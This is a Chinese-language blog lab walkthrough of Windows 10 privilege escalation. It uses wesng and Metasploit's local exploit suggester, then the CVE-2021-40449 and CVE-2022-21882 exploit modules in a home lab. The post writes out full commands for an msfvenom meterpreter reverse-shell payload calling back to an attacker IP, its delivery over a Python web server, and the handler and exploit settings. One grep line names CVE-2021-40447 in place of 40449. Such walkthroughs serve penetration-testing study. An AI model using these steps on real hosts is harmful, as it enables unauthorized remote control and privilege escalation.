CVE-2021-40449

0755

实验

实验环境

Windows10 受害者 192.168.192.147  使用wesng发现有CVE-2021-40449漏洞

Kali 攻击者 192.168.192.128

python wes.py systeminfo.txt -o win10.csv
cat win10.csv | grep "CVE-2021-40447"

屏幕截图 2024-02-02 233614

屏幕截图 2024-02-02 233651

 

实验步骤

此时我们不知道有CVE-2021-40449漏洞

step01:建立一个meterpreter木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.192.128 LPORT=1111 -f exe -o meterpreter.exe

 

step02:发送给受害者

python -m http.server 8080

 

step03:配置MSF

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.192.128
set LPORT 1111
exploit

屏幕截图 2024-02-03 001547

 

 

step04:拿到meterpreter

屏幕截图 2024-02-03 001631

 

step05:使用post/multi/recon/local_exploit_suggester模块找合适提权漏洞

background
show sessions
sessions -i 1
getuid
backgroud
use post/multi/recon/local_exploit_suggester
show options
set session1
exploit

屏幕截图 2024-02-03 002238

屏幕截图 2024-02-03 002353

发现CVE-2021-40449

 

search cve_2021_40449
use exploit/windows/local/cve_2021_40449
show options
set session 1
set LHOST 192.168.192.128
set LPORT 1111
exploit

 

发现貌似不行 无法提权

我们尝试使用别的

再次看post/multi/recon/local_exploit_suggester给的Potentially Vulnerable?为yes的漏洞

我们选择exploit/windows/local/cve_2022_21882_win32k

use exploit/windows/local/cve_2022_21882_win32k
show options
set session 1
set LHOST 192.168.192.128
set LPORT 1111
exploit

 

屏幕截图 2024-02-03 003909

ok成功提权

 

 

 

 

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
Windows的相关信息收集与提权
喜欢就支持一下吧
点赞5 分享
zhyann的头像-白鸢的笔记钻石会员
Active Directory Introduction and Enumeration 2-白鸢的笔记
Active Directory Introduction and Enumeration 2
Active Directory Introduction and Enumeration 2
1年前 182
winPEAS使用 利用有缺陷的注册表权限提权-白鸢的笔记
winPEAS使用 利用有缺陷的注册表权限提权
winPEAS使用 利用有缺陷的注册表权限提权
1年前 150
使用自动化脚本实现Linux信息收集工作-白鸢的笔记
使用自动化脚本实现Linux信息收集工作
使用自动化脚本实现Linux信息收集工作
2年前 138
NTLM认证-白鸢的笔记
NTLM认证
NTLM认证
11个月前 133
Exghost ftp爆破 curl上传-白鸢的笔记
Exghost ftp爆破 curl上传
Exghost ftp爆破 curl上传
11个月前 123
判断语句的嵌套-白鸢的笔记
判断语句的嵌套
判断语句的嵌套
2年前 118
相关推荐
winPEAS使用 利用有缺陷的注册表权限提权-白鸢的笔记
winPEAS使用 利用有缺陷的注册表权限提权
winPEAS使用 利用有缺陷的注册表权限提权
1年前 150
TryHackMe Windows PrivESC-白鸢的笔记
TryHackMe Windows PrivESC
TryHackMe Windows PrivESC
10个月前 103
powershell反弹shell制作-白鸢的笔记
powershell反弹shell制作
powershell反弹shell制作
10个月前 93
权限提升的自动化工具或脚本 PowerUp-白鸢的笔记
权限提升的自动化工具或脚本 PowerUp
权限提升的自动化工具或脚本 PowerUp
1年前 77
CVE-2021-40449-白鸢的笔记
CVE-2021-40449
CVE-2021-40449
1年前 75
Mimikatz简单使用-白鸢的笔记
Mimikatz简单使用
Mimikatz简单使用
1年前 64
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][se][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片